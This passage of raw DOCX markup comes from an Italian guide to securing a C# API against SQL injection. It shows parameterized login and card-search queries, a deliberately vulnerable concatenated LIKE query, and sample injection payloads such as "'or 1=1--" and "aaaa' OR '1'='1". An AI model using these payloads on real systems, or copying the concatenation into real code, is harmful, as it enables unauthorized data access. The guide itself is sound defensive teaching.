          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Npgsql</w:t>
      </w:r>
      <w:r w:rsidR="00FC3C95">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Parameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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1CD3D164" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2083"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4844444C" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="160"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C#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A940849" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="160"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string query = "SELECT 1 FROM Users WHERE Username = @username AND password = @password";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A79BF1D" w14:textId="77777777" w:rsidR="00B36301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using (var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cmd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new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SqlCommand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query, connection)) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26BCFF73" w14:textId="77777777" w:rsidR="00B36301" w:rsidRDefault="00B36301" w:rsidP="00B36301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1EA6A4C8" w14:textId="77777777" w:rsidR="00B36301" w:rsidRPr="00B36301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pt-PT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>cmd.Parameters.AddWithValue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>("@</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>input.Username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A0C4E84" w14:textId="77777777" w:rsidR="00B36301" w:rsidRPr="00096BC5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B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="pt-PT"/>
              </w:rPr>
              <w:t xml:space="preserve">   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cmd.Parameters.AddWithValue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("@password",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input.Password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);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="452D1131" w14:textId="77777777" w:rsidR="00B36301" w:rsidRPr="00096BC5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using (var reader = await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cmd.ExecuteReaderAsync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())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CF96CB9" w14:textId="77777777" w:rsidR="00B36301" w:rsidRPr="00096BC5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{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37CCF2F0" w14:textId="77777777" w:rsidR="00B36301" w:rsidRPr="00096BC5" w:rsidRDefault="00B36301" w:rsidP="00B36301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    if (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reader.HasRows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) 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{ /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* Genera il Token JWT *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/ }</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="4C90B33C" w14:textId="77777777" w:rsidR="00B36301" w:rsidRDefault="00B36301" w:rsidP="00B36301">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New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 xml:space="preserve">else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6638DAAA" w14:textId="77777777" w:rsidR="00B36301" w:rsidRDefault="00B36301" w:rsidP="00B36301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64AB5B20" w14:textId="446D16D9" w:rsidR="006766AD" w:rsidRPr="00477548" w:rsidRDefault="00B36301" w:rsidP="00477548"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23DC31C" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="006766AD"/>
    <w:p w14:paraId="1672A832" w14:textId="69CF9574" w:rsidR="006766AD" w:rsidRDefault="00B36301">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="00B36301">
        <w:lastRenderedPageBreak/>
        <w:t>A questo punto,</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">'iniezione del payload </w:t>
      </w:r>
      <w:r w:rsidR="00477548">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00477548" w:rsidRPr="00477548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00477548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>or 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00477548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--"</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> cercherà un utente il cui username sia letteralmente la stringa </w:t>
      </w:r>
      <w:r w:rsidR="00477548">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00477548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>’o</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r 1=1</w:t>
      </w:r>
      <w:r w:rsidR="00477548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>--”</w:t>
      </w:r>
      <w:r>
        <w:t>. Il risultato è che l’autenticazione restituisce correttamente un 404</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EDDA0E" w14:textId="10CBACFF" w:rsidR="00B36301" w:rsidRDefault="00000000" w:rsidP="00B36301">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Messa in sicurezza dell'API della </w:t>
      </w:r>
      <w:r w:rsidR="009542D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ista </w:t>
      </w:r>
      <w:r w:rsidR="009542D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AB4149" w14:textId="6FCA8356" w:rsidR="006766AD" w:rsidRPr="00B36301" w:rsidRDefault="00477548" w:rsidP="00B36301">
      <w:r>
        <w:t>Un primo approccio è stato quello</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:t xml:space="preserve"> di parametrizzare la query scrivendo il </w:t>
      </w:r>
      <w:r>
        <w:t>seguente codice.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af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096BC5" w14:paraId="497BB54B" w14:textId="77777777" w:rsidTr="00B36301">
        <w:trPr>
          <w:trHeight w:val="1483"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DAF8BC9" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:before="240" w:line="278" w:lineRule="auto"/>
              <w:outlineLvl w:val="3"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="2" w:name="_4y41vi4aav28" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="3" w:name="_68ryib7bmiro" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="2"/>
            <w:bookmarkEnd w:id="3"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BC43093" w14:textId="77777777" w:rsidR="00B36301" w:rsidRPr="00B36301" w:rsidRDefault="00B36301" w:rsidP="00B36301">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:iCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_qqiavxjgghn" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="5" w:name="_6ks3jeessh3x" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="4"/>
            <w:bookmarkEnd w:id="5"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">string query = "SELECT * FROM cards WHERE issuer LIKE '%@search%'"; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="124DB093" w14:textId="3BE75302" w:rsidR="006766AD" w:rsidRPr="00B36301" w:rsidRDefault="00B36301" w:rsidP="00B36301">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_gvszt0hrzwhe" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="6"/>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cmd.Parameters.AddWithValue</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>("@search", text);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="429D78DD" w14:textId="77777777" w:rsidR="00B36301" w:rsidRDefault="00B36301" w:rsidP="00B36301">
      <w:bookmarkStart w:id="7" w:name="_3oq1ozl8vwc9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="2988D931" w14:textId="77777777" w:rsidR="00477548" w:rsidRDefault="00477548" w:rsidP="00B36301">
      <w:r>
        <w:t>Tuttavia, i</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">l database non capisce che </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>@search</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve"> è una variabile! Di conseguenza, andrà a cercare nel tabellone una carta il cui emittente contiene letteralmente i caratteri </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="00B36301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="00000000" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tornando così risultati errati</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B962B" w14:textId="5A1C7ED4" w:rsidR="00B36301" w:rsidRPr="00B36301" w:rsidRDefault="00000000" w:rsidP="00B36301">
      <w:r>
        <w:t xml:space="preserve">Se per </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36301">
        <w:t xml:space="preserve">risolvere il problema sopra </w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve">avessimo deciso </w:t>
      </w:r>
      <w:r w:rsidRPr="00B36301">
        <w:t xml:space="preserve">di </w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t>usare il codice</w:t>
      </w:r>
      <w:r w:rsidR="00E41DF6">
        <w:t xml:space="preserve"> nel riquadro seguente</w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve">, saremmo tornati ad essere soggetti a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve"> Injection </w:t>
      </w:r>
      <w:r w:rsidR="00B36301">
        <w:t>avendo</w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B36301">
        <w:t>semplicemente concatenato</w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B36301">
        <w:t>l’input</w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve">. Se l'utente scrivesse l'apice maligno </w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>aaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>' OR '1'='1)</w:t>
      </w:r>
      <w:r w:rsidR="00B36301" w:rsidRPr="00B36301">
        <w:t xml:space="preserve">, quell'apice romperebbe la query e </w:t>
      </w:r>
      <w:r w:rsidR="00B36301">
        <w:t>l’attacco riuscirebbe.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af4"/>
        <w:tblW w:w="89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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="006766AD" w:rsidRPr="00096BC5" w14:paraId="5EA8D9D3" w14:textId="77777777" w:rsidTr="00B36301">
        <w:trPr>
          <w:trHeight w:val="839"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8971" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45D3852D" w14:textId="0BF0A363" w:rsidR="006766AD" w:rsidRPr="00096BC5" w:rsidRDefault="00B36301">
            <w:pPr>
              <w:pStyle w:val="Heading4"/>
              <w:keepNext w:val="0"/>
              <w:keepLines w:val="0"/>
              <w:spacing w:before="240" w:after="240" w:line="278" w:lineRule="auto"/>
              <w:outlineLvl w:val="3"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="8" w:name="_djalx0quhjdj" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkStart w:id="9" w:name="_61792jvi0af5" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="8"/>
            <w:bookmarkEnd w:id="9"/>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">tring query = </w:t>
            </w:r>
            <w:r w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidR="00000000" w:rsidRPr="00096BC5">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SELECT * FROM cards WHERE issuer LIKE '%" + text + "%'";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C643807" w14:textId="58321BD2" w:rsidR="006766AD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_gw5e5bujy4f1" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="11" w:name="_alsu0fgbjh78" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t xml:space="preserve">Anche per l'operatore </w:t>
      </w:r>
      <w:r w:rsidRPr="00477548">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Roboto Mono" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l'input non deve mai essere concatenato. Il carattere jolly </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Roboto Mono"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deve essere unito al valore del parametro lato codice .NET, non nella stringa SQL.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af5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14:paraId="604C7DCD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="2083"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BC65F33" w14:textId="77777777" w:rsidR="006766AD" w:rsidRPr="00B36301" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="160"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B36301">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6083FE92" w14:textId="77777777" w:rsidR="006766AD" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="160"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string query = "SELECT number,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expirydate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, issuer FROM cards WHERE issuer LIKE @search";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEC2E40" w14:textId="77777777" w:rsidR="00A319A8" w:rsidRDefault="00A319A8">
            <w:pPr>
              <w:spacing w:after="160" w:line="278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BB73792" w14:textId="77777777" w:rsidR="00A319A8" w:rsidRPr="00096BC5" w:rsidRDefault="00A319A8" w:rsidP="00A319A8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using (var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cmd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= new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SqlCommand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query, connection))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDBD293" w14:textId="77777777" w:rsidR="00A319A8" w:rsidRDefault="00A319A8" w:rsidP="00A319A8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8DAA37A" w14:textId="22AC0842" w:rsidR="00A319A8" w:rsidRPr="00096BC5" w:rsidRDefault="00A319A8" w:rsidP="00A319A8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A319A8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cmd.Parameters.AddWithValue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("@search", $"%{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inputText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}%");</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C02AA04" w14:textId="00E8091C" w:rsidR="00A319A8" w:rsidRPr="00096BC5" w:rsidRDefault="00A319A8" w:rsidP="00A319A8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using (var reader = await </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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cmd.ExecuteReaderAsync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D4122B5" w14:textId="2BD08E5D" w:rsidR="00A319A8" w:rsidRDefault="00A319A8" w:rsidP="00A319A8">
            <w:pPr>
              <w:spacing w:line="278" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New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>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30D0E44D" w14:textId="1FFC144C" w:rsidR="00A319A8" w:rsidRDefault="00A319A8" w:rsidP="00A319A8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...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="381E2F07" w14:textId="2394D6AB" w:rsidR="00A319A8" w:rsidRDefault="00A319A8" w:rsidP="00A319A8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}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CE7432" w14:textId="78FEEB84" w:rsidR="00A319A8" w:rsidRPr="00A319A8" w:rsidRDefault="00A319A8" w:rsidP="00A319A8">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto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83D1F72" w14:textId="1865A17B" w:rsidR="009542D4" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="009542D4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009542D4">
        <w:t>piggybacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009542D4">
        <w:t xml:space="preserve"> queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">es. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
